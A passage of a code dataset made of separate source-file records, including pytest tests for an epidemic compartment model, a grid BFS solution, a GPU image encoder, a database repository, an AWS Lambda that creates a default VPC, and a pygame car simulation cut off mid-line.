summer_py.constants import Compartment, Flow, BirthApproach, Stratification, IntegrationType\n\n\nPARAM_VARS = \"flows, custom_func, params, adjustment, comps, expected_flows, expected_custom_func, expected_params\"\nPARAM_VALS = [\n # Start with two transition flows and two parameters,\n # Apply 2x strata and 1x parameter adjustment\n # Apply strata to all compartments\n # Expect 4 new transition flows and 
2 new parameters.\n [\n # Starting flow\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n ],\n # Starting custom flow funcs\n {},\n # Starting params\n {\"flow_0\": 0.5, \"flow_1\": 0.1,},\n # Adjustments\n {\"flow_0\": {\"foo\": 0.2, \"bar\": 0.7,}},\n # Compartments to stratify\n [\"susceptible\", \"infectious\"],\n # Expected flows\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\n \"standard_flows\",\n \"flow_0Xtest_foo\",\n \"susceptibleXtest_foo\",\n \"infectiousXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_0Xtest_bar\",\n \"susceptibleXtest_bar\",\n \"infectiousXtest_bar\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1\",\n \"infectiousXtest_foo\",\n \"susceptibleXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1\",\n \"infectiousXtest_bar\",\n \"susceptibleXtest_bar\",\n 1,\n None,\n None,\n ],\n ],\n # Expected custom funcs\n {},\n # Expected params\n {\"flow_0\": 0.5, \"flow_1\": 0.1, \"flow_0Xtest_foo\": 0.2, \"flow_0Xtest_bar\": 0.7},\n ],\n # Same as above but only stratify one compartment\n [\n # Starting flows\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n ],\n # Starting custom flow funcs\n {},\n # Starting params\n {\"flow_0\": 0.5, \"flow_1\": 0.1,},\n # Adjustments\n {\"flow_0\": {\"foo\": 0.2, \"bar\": 0.7,}},\n # Compartments to stratify\n [\"susceptible\"],\n # Expected flows\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\n \"standard_flows\",\n \"flow_0Xtest_foo\",\n \"susceptibleXtest_foo\",\n \"infectious\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_0Xtest_bar\",\n \"susceptibleXtest_bar\",\n \"infectious\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1Xtest_foo\",\n \"infectious\",\n \"susceptibleXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1Xtest_bar\",\n \"infectious\",\n \"susceptibleXtest_bar\",\n 1,\n None,\n None,\n ],\n ],\n # Expected custom funcs\n {},\n # Expected params\n {\n \"flow_0\": 0.5,\n \"flow_1\": 0.1,\n \"flow_0Xtest_foo\": 0.2,\n \"flow_0Xtest_bar\": 0.7,\n \"flow_1Xtest_foo\": 0.5,\n \"flow_1Xtest_bar\": 0.5,\n },\n ],\n # Expect custom flow funcs to be updated\n [\n # Starting flow\n [\n [\"customised_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"customised_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\"customised_flows\", \"flow_2\", \"comp_0\", \"comp_1\", 0, None, None],\n ],\n # Starting custom flow funcs\n {0: \"func_for_flow_0\", 1: \"func_for_flow_1\", 2: \"func_for_flow_2\"},\n # Starting params\n {\"flow_0\": 0.5, \"flow_1\": 0.1, \"flow_2\": 1.9},\n # Adjustments\n {},\n # Compartments to stratify\n [\"susceptible\"],\n # Expected flows\n [\n [\"customised_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"customised_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\"customised_flows\", \"flow_2\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"customised_flows\", \"flow_0\", 
\"susceptibleXtest_foo\", \"infectious\", 1, None, None,],\n [\"customised_flows\", \"flow_0\", \"susceptibleXtest_bar\", \"infectious\", 1, None, None,],\n [\n \"customised_flows\",\n \"flow_1Xtest_foo\",\n \"infectious\",\n \"susceptibleXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"customised_flows\",\n \"flow_1Xtest_bar\",\n \"infectious\",\n \"susceptibleXtest_bar\",\n 1,\n None,\n None,\n ],\n [\"customised_flows\", \"flow_2\", \"comp_0\", \"comp_1\", 1, None, None],\n ],\n # Expected custom funcs\n {\n 0: \"func_for_flow_0\",\n 1: \"func_for_flow_1\",\n 2: \"func_for_flow_2\",\n 3: \"func_for_flow_0\",\n 4: \"func_for_flow_0\",\n 5: \"func_for_flow_1\",\n 6: \"func_for_flow_1\",\n 7: \"func_for_flow_2\",\n },\n # Expected params\n {\n \"flow_0\": 0.5,\n \"flow_1\": 0.1,\n \"flow_1Xtest_foo\": 0.5,\n \"flow_1Xtest_bar\": 0.5,\n \"flow_2\": 1.9,\n },\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_stratify_transition_flows(\n flows,\n custom_func,\n params,\n adjustment,\n comps,\n expected_flows,\n expected_custom_func,\n expected_params,\n):\n \"\"\"\n Ensure that `stratify_compartments` splits up transition flows correctly.\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n cols = [\"type\", \"parameter\", \"origin\", \"to\", \"implement\", \"strain\", \"force_index\"]\n model.transition_flows = pd.DataFrame(flows, columns=cols).astype(object)\n model.parameters = params\n strat_name = \"test\"\n strata_names = [\"foo\", \"bar\"]\n model.customised_flow_functions = custom_func\n model.all_stratifications = {strat_name: strata_names}\n model.stratify_compartments(strat_name, strata_names, {\"foo\": 0.5, \"bar\": 0.5}, comps)\n model.stratify_transition_flows(strat_name, strata_names, adjustment, comps)\n # Check flows df stratified\n expected_flows_df = pd.DataFrame(expected_flows, columns=cols).astype(object)\n assert_frame_equal(expected_flows_df, model.transition_flows)\n # Check custom flow func is updated\n assert model.customised_flow_functions == expected_custom_func\n # Check params are stratified\n for k, v in expected_params.items():\n assert model.parameters[k] == v\n\n\nPARAM_VARS = \"back_one, include_change, all_stratifications, flows, expected_idxs\"\nPARAM_VALS = [\n # Test default case - expect all flow idxs.\n [\n 0,\n False,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 1],\n ],\n # Test default case, but 1 flow has wrong implement - expect all flow idxs except that one.\n [\n 0,\n False,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 1, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [1],\n ],\n # Test default case, but 1 strats added yet with back 1 - expect all flow idxs.\n [\n 1,\n False,\n {\"age\": [0, 5, 15, 50]},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 1],\n ],\n # Test default case, but 1 strats added yet no back 1 - expect no flow idxs.\n [\n 0,\n False,\n {\"age\": [0, 5, 15, 50]},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [],\n ],\n # Test default case, but with a strata change flow - expect all flow idxs except strata change flow.\n [\n 0,\n False,\n 
{},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"strata_change\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 2],\n ],\n # Test default case, but with a strata change flow and 'include change' - expect all flow idxs.\n [\n 0,\n True,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"strata_change\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 1, 2],\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_find_transition_indices_to_implement(\n back_one, include_change, all_stratifications, flows, expected_idxs\n):\n \"\"\"\n Ensure `find_transition_indices_to_implement` returns the correct list of indices.\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n cols = [\"type\", \"parameter\", \"origin\", \"to\", \"implement\", \"strain\", \"force_index\"]\n model.transition_flows = pd.DataFrame(flows, columns=cols).astype(object)\n model.all_stratifications = all_stratifications\n actual_idxs = model.find_transition_indices_to_implement(back_one, include_change)\n assert expected_idxs == actual_idxs\n\n\nPARAM_VARS = \"strata,proportions,to_stratify,expected_names,expected_values\"\nPARAM_VALS = [\n # Use 2 strata, expect 2x new compartments, strata split evenly.\n [\n [\"foo\", \"bar\"],\n {\"foo\": 0.5, \"bar\": 0.5},\n [\"susceptible\", \"infectious\"],\n [\n \"susceptibleXtest_foo\",\n \"susceptibleXtest_bar\",\n \"infectiousXtest_foo\",\n \"infectiousXtest_bar\",\n ],\n [450, 450, 50, 50],\n ],\n # Use 2 strata, expect 2x new compartments, strata split unevenly.\n [\n [\"foo\", \"bar\"],\n {\"foo\": 0.1, \"bar\": 0.9},\n [\"susceptible\", \"infectious\"],\n [\n \"susceptibleXtest_foo\",\n \"susceptibleXtest_bar\",\n \"infectiousXtest_foo\",\n \"infectiousXtest_bar\",\n ],\n [90, 810, 10, 90],\n ],\n # Use 2 strata, don't stratify infectious.\n [\n [\"foo\", \"bar\"],\n {\"foo\": 0.5, \"bar\": 0.5},\n [\"susceptible\"],\n [\"infectious\", \"susceptibleXtest_foo\", \"susceptibleXtest_bar\"],\n [100, 450, 450],\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_stratify_compartments(strata, proportions, to_stratify, expected_names, expected_values):\n \"\"\"\n Ensure that `stratify_compartments` splits up compartment names and values correctly.\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n model.stratify_compartments(\"test\", strata, proportions, to_stratify)\n assert model.compartment_names == expected_names\n assert model.compartment_values == expected_values\n\n\nPARAM_VARS = \"age_strata,expected_flows,expected_ageing\"\nPARAM_VALS = [\n # Test simple age split, expect ageing to be proprotional to bracket width.\n [\n [0, 50],\n [\n [\n \"standard_flows\",\n \"ageing0to50\",\n \"susceptibleXage_0\",\n \"susceptibleXage_50\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing0to50\",\n \"infectiousXage_0\",\n \"infectiousXage_50\",\n 0,\n None,\n None,\n ],\n ],\n {\"ageing0to50\": 1 / 50},\n ],\n # Test typical age split, expect ageing to be proprotional to bracket width.\n [\n [0, 5, 15, 50],\n [\n [\n \"standard_flows\",\n \"ageing0to5\",\n \"susceptibleXage_0\",\n \"susceptibleXage_5\",\n 0,\n None,\n None,\n ],\n [\"standard_flows\", \"ageing0to5\", \"infectiousXage_0\", \"infectiousXage_5\", 0, None, None],\n [\n 
\"standard_flows\",\n \"ageing5to15\",\n \"susceptibleXage_5\",\n \"susceptibleXage_15\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing5to15\",\n \"infectiousXage_5\",\n \"infectiousXage_15\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing15to50\",\n \"susceptibleXage_15\",\n \"susceptibleXage_50\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing15to50\",\n \"infectiousXage_15\",\n \"infectiousXage_50\",\n 0,\n None,\n None,\n ],\n ],\n {\"ageing0to5\": 1 / 5, \"ageing5to15\": 1 / 10, \"ageing15to50\": 1 / 35,},\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_set_ageing_rates(age_strata, expected_flows, expected_ageing):\n \"\"\"\n Ensure that `set_ageing_rates` adds ageing flows to the transition flows dataframe\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n cols = [\"type\", \"parameter\", \"origin\", \"to\", \"implement\", \"strain\", \"force_index\"]\n # Ensure there are no initial flows\n initial_df = pd.DataFrame([], columns=cols).astype(object)\n assert_frame_equal(initial_df, model.transition_flows)\n # Set ageing rates\n model.set_ageing_rates(age_strata)\n\n # Check ageing flows are set\n expected_df = pd.DataFrame(expected_flows, columns=cols).astype(object)\n assert_frame_equal(expected_df, model.transition_flows)\n # Check ageing params are set\n for k, v in expected_ageing.items():\n assert model.parameters[k] == v\n\n\ndef _get_model_kwargs(**kwargs):\n return {\n \"times\": [2000, 2001, 2002, 2003, 2004, 2005],\n \"compartment_types\": [Compartment.SUSCEPTIBLE, Compartment.INFECTIOUS],\n \"initial_conditions\": {Compartment.INFECTIOUS: 100},\n \"parameters\": {},\n \"requested_flows\": [],\n \"starting_population\": 1000,\n **kwargs,\n }\n","repo_name":"monash-emu/legacy-summer","sub_path":"tests/test_strat_model/test_stratify.py","file_name":"test_stratify.py","file_ext":"py","file_size_in_byte":15888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15088843969","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom queue import Queue\r\n\r\nh,w = map(int,input().split())\r\nblack, white = 0,0\r\ns = [[0] * w for _ in range(h)]\r\nfor i in range(h):\r\n s[i] = list(input())\r\n for j in range(w):\r\n if s[i][j] == \".\":\r\n white += 1\r\n else:\r\n black += 1\r\n\r\ndef bfs():\r\n global ans,checked\r\n while not que.empty():\r\n xy = que.get()\r\n if xy[0] == w - 1 and xy[1] == h - 1:\r\n ans = checked[xy[1]][xy[0]]\r\n return\r\n for i in range(-1,2):\r\n for j in range(-1,2):\r\n if i == j or i == -j:\r\n continue\r\n if 0 <= xy[0] + i < w and 0 <= xy[1] + j < h:\r\n if checked[xy[1] + j][xy[0] + i] == -1 and s[xy[1] + j][xy[0] + i] == \".\":\r\n checked[xy[1] + j][xy[0] + i] = checked[xy[1]][xy[0]] + 1\r\n que.put([xy[0] + i,xy[1] + j])\r\n\r\nque = Queue()\r\nans = -1\r\nchecked = [[-1] * w for _ in range(h)]\r\nchecked[0][0] = 0\r\nque.put([0,0])\r\n\r\nbfs()\r\nif ans != -1:\r\n print(white - ans - 1)\r\nelse:\r\n print(-1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc088/D/4896129.py","file_name":"4896129.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"22011499970","text":"#!/usr/bin/python3\n\"\"\"This module contains\n =>write_file\n\"\"\"\n\n\ndef write_file(filename=\"\", text=\"\"):\n \"\"\"This function writes a string into txt file\n \"\"\"\n nb = 0\n with open(filename, 'w', 
encoding=\"utf-8\") as f:\n nb = f.write(text)\n return nb\n","repo_name":"afissama/alx-higher_level_programming","sub_path":"0x0B-python-input_output/1-write_file.py","file_name":"1-write_file.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32566271619","text":"from __future__ import division\n\nimport ctypes\nimport threading\nfrom io import BytesIO\nfrom picamera import mmal, mmalobj\nfrom threading import Event\n\ngpulock = threading.Lock()\n\nclass Resize_YUV():\n def __init__(self):\n self.resizer = mmalobj.MMALResizer()\n self.finished = Event()\n self.output = None\n\n def _callback(self, port, buf):\n finished = bool(buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END)\n if finished is True:\n with buf as data:\n if self.output is None:\n self.output = bytes(data)\n else:\n self.output.write(data)\n self.finished.set()\n return finished\n\n def resize(self, YUV_DATA, from_size, to_size, output= None):\n gpulock.acquire()\n result = None\n try:\n if type(output) == str:\n self.output = open(output, \"wb\")\n\n self.resizer.inputs[0].format = mmal.MMAL_ENCODING_I420\n self.resizer.inputs[0].framesize = from_size\n self.resizer.inputs[0].commit()\n self.resizer.inputs[0].enable(lambda port, buf: True)\n\n self.resizer.outputs[0].format = mmal.MMAL_ENCODING_I420\n self.resizer.outputs[0].framesize = to_size\n self.resizer.outputs[0].commit()\n self.resizer.outputs[0].enable(self._callback)\n\n buf = self.resizer.inputs[0].get_buffer()\n buf.data = YUV_DATA\n self.resizer.inputs[0].send_buffer(buf)\n\n if not self.finished.wait(30):\n raise Exception('resizer timed out')\n\n if type(output) == str:\n self.output.close()\n else:\n result = self.output\n self.output = None\n finally:\n self.resizer.outputs[0].disable()\n self.resizer.inputs[0].disable()\n self.finished.clear()\n gpulock.release()\n return result\n\nclass YUV_to_JPEG():\n def __init__(self):\n self.encoder = mmalobj.MMALImageEncoder()\n self.finished = Event()\n self.output = None\n\n def _callback(self, port, buf):\n finished = bool(buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END)\n if finished is True:\n with buf as data:\n if self.output is None:\n self.output = bytes(data)\n else:\n self.output.write(data)\n self.finished.set()\n return finished\n\n def encode(self, YUV_DATA, framesize, quality, output= None):\n gpulock.acquire()\n result = None\n try:\n if type(output) == str:\n self.output = open(output, \"wb\")\n\n self.encoder.inputs[0].format = mmal.MMAL_ENCODING_I420\n self.encoder.inputs[0].framesize = framesize\n self.encoder.inputs[0].commit()\n self.encoder.inputs[0].enable(lambda port, buf: True)\n\n self.encoder.outputs[0].copy_from(self.encoder.inputs[0])\n self.encoder.outputs[0].format = mmal.MMAL_ENCODING_JPEG\n self.encoder.outputs[0].params[mmal.MMAL_PARAMETER_JPEG_Q_FACTOR] = quality\n self.encoder.outputs[0].framesize = framesize\n self.encoder.outputs[0].commit()\n self.encoder.outputs[0].enable(self._callback)\n\n buf = self.encoder.inputs[0].get_buffer()\n buf.data = YUV_DATA\n self.encoder.inputs[0].send_buffer(buf)\n\n if not self.finished.wait(30):\n raise Exception('encode timed out')\n\n if type(output) == str:\n self.output.close()\n else:\n result = self.output\n self.output = None\n finally:\n self.encoder.outputs[0].disable()\n self.encoder.inputs[0].disable()\n self.finished.clear()\n gpulock.release()\n return result\n\n\n_resize_YUVInstance = None\ndef Resize_YUVInstance():\n 
global _resize_YUVInstance\n    if _resize_YUVInstance is None:\n        _resize_YUVInstance = Resize_YUV()\n    return _resize_YUVInstance\n\n\n_YUV_to_JPEGInstance = None\ndef YUV_to_JPEGInstance():\n    global _YUV_to_JPEGInstance\n    if _YUV_to_JPEGInstance is None:\n        _YUV_to_JPEGInstance = YUV_to_JPEG()\n    return _YUV_to_JPEGInstance\n","repo_name":"dirk-makerhafen/openpi3dscan","sub_path":"client/src/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19340434875","text":"from sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Session\nfrom app.reservations.models import Reservation\nfrom app.reservations.exceptions import ReservationNotFoundException\n\n\nclass ReservationRepository:\n\n    def __init__(self, db: Session):\n        self.db = db\n\n    def create_reservation(self, ticket_id, user_id):\n        \"\"\"\n        It creates a new reservation for a ticket and user\n        @param ticket_id - The id of the ticket that is being reserved.\n        @param user_id - The id of the user who is making the reservation.\n        @returns A reservation object\n        \"\"\"\n        try:\n            reservation = Reservation(ticket_id=ticket_id, user_id=user_id)\n            self.db.add(reservation)\n            self.db.commit()\n            self.db.refresh(reservation)\n            return reservation\n        except IntegrityError as e:\n            raise e\n        except Exception as e:\n            raise e\n\n    def read_all_reservations(self):\n        \"\"\"\n        It returns all the reservations in the database\n        @returns A list of all reservations in the database.\n        \"\"\"\n        reservations = self.db.query(Reservation).all()\n        return reservations\n\n    def read_reservation_by_id(self, reservation_id: str):\n        \"\"\"\n        It returns a reservation object from the database if it exists, otherwise it raises an exception\n        @param {str} reservation_id - The ID of the reservation to be read.\n        @returns The reservation object is being returned.\n        \"\"\"\n        reservation = self.db.query(Reservation).filter(Reservation.reservation_id == reservation_id).first()\n        if reservation is None:\n            raise ReservationNotFoundException(f\"Reservation with provided ID: {reservation_id} not found.\", 400)\n        return reservation\n\n    def delete_reservation(self, reservation_id: str):\n        \"\"\"\n        It deletes a reservation from the database\n        @param {str} reservation_id - The ID of the reservation to be deleted.\n        @returns True\n        \"\"\"\n        try:\n            reservation = self.db.query(Reservation).filter(Reservation.reservation_id == reservation_id).first()\n            if reservation is None:\n                raise ReservationNotFoundException(f\"Reservation with provided ID: {reservation_id} not found.\", 400)\n            self.db.delete(reservation)\n            self.db.commit()\n            return True\n        except Exception as e:\n            raise e\n","repo_name":"nemanja-stankovic/PROJEKAT-II","sub_path":"app/reservations/repositories/reservation_repository.py","file_name":"reservation_repository.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17827237250","text":"import boto3\nimport json\nimport logging\nimport urllib3\n\nhttp = urllib3.PoolManager()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndef lambda_handler(event, context):\n    logger.info(event)\n    client = boto3.client('ec2')\n    \"\"\" Get VPC list \"\"\"\n    response = client.describe_vpcs()\n    vpclist = response.get('Vpcs')\n\n    \"\"\" Flag to track if the default vpc exists \"\"\"\n    hasdefault = False\n\n    \"\"\" Iterate over dict of VPCs and check to see if we 
have a default VPC \"\"\"\n for vpcs in vpclist:\n \"\"\" Search for IsDefault value in vpcs list \"\"\"\n if 'IsDefault' in vpcs:\n vpcname = vpcs.get(\"VpcId\")\n print (\"VPC: %s\" % vpcname)\n isd = vpcs.get(\"IsDefault\")\n print (\"IsDefault value: %s\" % isd)\n if isd:\n \"\"\" Region has the default vpc - set flag to True \"\"\"\n hasdefault = True\n break\n\n print (\"Has default: %s\" % hasdefault)\n \"\"\" Create default VPC and associated networking \"\"\"\n if not hasdefault:\n print (\"We need to create the default vpc\")\n try:\n response = client.create_default_vpc()\n print (response)\n except Exception as error:\n print (error)\n response_value = int(event['ResourceProperties']['Input']) * 5\n response_data = {}\n response_data['Data'] = response_value\n send_response(event, context, \"SUCCESS\", \"Default VPC Created\", response_data)\n\ndef send_response(event, context, status, reason, data):\n body = json.dumps({\n \"Status\": status,\n \"Reason\": reason,\n \"PhysicalResourceId\": context.log_stream_name,\n \"StackId\": event.get(\"StackId\"),\n \"RequestId\": event.get(\"RequestId\"),\n \"LogicalResourceId\": event.get(\"LogicalResourceId\"),\n \"NoEcho\": False,\n \"Data\": data\n })\n http.request(\n \"PUT\",\n event.get(\"ResponseURL\"),\n body=body,\n headers={\n \"Content-Type\": \"\",\n \"Content-Length\": str(len(body))\n }\n )\n","repo_name":"mvillafuertem/spark","sub_path":"modules/map-reduce/src/main/scala/io/github/mvillafuertem/map/reduce/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39811837722","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n###-------------------------------------------------------------------\n### File : postprocessor.py\n### Author : Oleg Baskakov\n### Description : postprocessor show result\n###\n### 2011. 
Written for Moscow Aviation Institute.\n###-------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\n\n\n#=====================================================================\n\ndef main():\n\ttry:\n\t\tk = int(sys.argv[1])\n\texcept:\n\t\tk = 0\n\t\n\tif len(sys.argv) <= 1:\n\t\tf = open(\"result\")\n\t\tdd = eval(f.read())\n\t\tY = dd['tmp']\n\t\tX = list(range(len(Y)))\n\t\tplt.plot(X, Y, color=\"black\")\n\t\tplt.show()\n\t\treturn\n\t\n\t\n\t\n\t\n\tprint(\"k =\", k)\n\n\tf = open(\"result\")\n\tdd = eval(f.read())\n\tres = dd['result']\n\tif 'grid' in dd:\n\t\tgrid = dd['grid']\n\telse:\n\t\tgrid = range(len(res))\n\t\n\tif 'origin' in dd:\n\t\torigin = dd['origin']\n\t\tplt.plot(grid, origin[k], color=\"blue\")\n\n\tplt.plot(grid, res[k], color=\"red\")\n\n\tplt.show()\n\n\t\n\t\n\t\n#=====================================================================\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n","repo_name":"spetz911/CM","sub_path":"lab5/postprocessor.py","file_name":"postprocessor.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22161109611","text":"import pygame\nimport math\n\nscreenWidth = 900\nscreenHeight = 900\ncheckPoints = ((800, 100), (800, 280), (450, 350), (810, 430), (750, 810), (550, 540), \n               (380, 810), (70, 500), (130, 80), (260, 450), (100, 100))\n\ndef getDistance(p1, p2):\n\treturn math.sqrt(math.pow((p1[0] - p2[0]), 2) + math.pow((p1[1] - p2[1]), 2))\n\ndef rotateCenter(image, angle):\n    originalRect = image.get_rect()\n    rotateIMG = pygame.transform.rotate(image, angle)\n    rotateRect = originalRect.copy()\n    rotateRect.center = rotateIMG.get_rect().center\n    rotateIMG = rotateIMG.subsurface(rotateRect).copy()\n    return rotateIMG\n\nclass Car:\n    def __init__(self, carIMG, trackIMG, pos):\n        self.car = pygame.image.load(carIMG)\n        self.track = pygame.image.load(trackIMG)\n        self.car = pygame.transform.scale(self.car, (65, 65))\n        self.rotateCar = self.car\n        self.pos = pos\n        self.angle = 0\n        self.speed = 0\n        self.center = [self.pos[0] + 50, self.pos[1] + 50]\n        self.eyes = []\n        self.backEyes = []\n        self.alive = True\n        self.checkPoint = 0\n        self.prevDistance = 0\n        self.currentDistance = 0\n        self.finish = False\n        self.checkFlag = False\n        self.distance = 0\n        self.time = 0\n\n        for d in range(-90, 120, 45):\n            self.checkEyes(d)\n            self.checkBackEyes(d)\n\n    #Draws current car state to screen\n    def draw(self, screen):\n        screen.blit(self.rotateCar, self.pos)\n\n    # Checks which eyes should be drawn\n    def checkEyes(self, degrees):\n        len = 0\n        x = int(self.center[0] + math.cos(math.radians(360 - (self.angle + degrees))) * len)\n        y = int(self.center[1] + math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n        while not self.track.get_at((x, y)) == (0, 0, 0, 255):\n            len = len + 1\n            x = int(self.center[0] + math.cos(math.radians(360 - (self.angle + degrees))) * len)\n            y = int(self.center[1] + math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n        dist = int(math.sqrt(math.pow(x - self.center[0], 2) + math.pow(y - self.center[1], 2)))\n        self.eyes.append([(x, y), dist])\n\n    #Checks which eyes should be drawn in the back\n    def checkBackEyes(self, degrees):\n        len = 0\n        x = int(self.center[0] - math.cos(math.radians(360 - (self.angle + degrees))) * len)\n        y = int(self.center[1] - math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n        while not self.track.get_at((x, y)) 
== (0, 0, 0, 255):\n            len = len + 1\n            x = int(self.center[0] - math.cos(math.radians(360 - (self.angle + degrees))) * len)\n            y = int(self.center[1] - math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n        dist = int(math.sqrt(math.pow(x - self.center[0], 2) + math.pow(y - self.center[1], 2)))\n        self.backEyes.append([(x, y), dist])\n    \n    #Draws 9 eyes in front of car\n    def drawEyes(self, screen):\n        for r in self.eyes:\n            pos, dist = r\n            pygame.draw.line(screen, (255, 255, 0), self.center, pos, 1)\n            pygame.draw.circle(screen, (255, 255, 0), pos, 5)\n        for r in self.backEyes:\n            pos, dist = r\n            pygame.draw.line(screen, (255, 255, 0), self.center, pos, 1)\n            pygame.draw.circle(screen, (255, 255, 0), pos, 5)\n\n    #Check for collision using colours\n    def checkCollision(self):\n        self.alive = True\n        for p in self.corners:\n            if self.track.get_at((int(p[0]), int(p[1]))) == (0, 0, 0, 255):\n                self.alive = False\n                break\n\n    #Check if car reached a checkpoint\n    def checkCheckPoint(self):\n        p = checkPoints[self.checkPoint]\n        self.prevDistance = self.currentDistance\n        dist = getDistance(p, self.center)\n        if dist < 70:\n            self.checkPoint += 1\n            self.prevDistance = 9999\n            self.checkFlag = True\n            if self.checkPoint >= len(checkPoints):\n                self.checkPoint = 0\n                self.finish = True\n        else:\n            self.finish = False\n\n        self.currentDistance = dist\n\n    #Car actions and updates\n    def update(self):\n        #check speed\n        self.speed -= 0.5\n        if self.speed > 5:\n            self.speed = 5\n        if self.speed < 0.5:\n            self.speed = 0.5\n\n        #check position\n        self.rotateCar = rotateCenter(self.car, self.angle)\n        self.pos[0] += math.cos(math.radians(360 - self.angle)) * self.speed\n\n        self.distance += self.speed\n        self.time += 1\n        self.pos[1] += math.sin(math.radians(360 - self.angle)) * self.speed\n\n        # calculate 4 collision points\n        self.center = [int(self.pos[0]) + 32.5, int(self.pos[1]) + 32.5]\n        len = 20\n        LT = [self.center[0] + math.cos(math.radians(360 - (self.angle + 30))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 30))) * len]\n        RT = [self.center[0] + math.cos(math.radians(360 - (self.angle + 150))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 150))) * len]\n        LB = [self.center[0] + math.cos(math.radians(360 - (self.angle + 210))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle 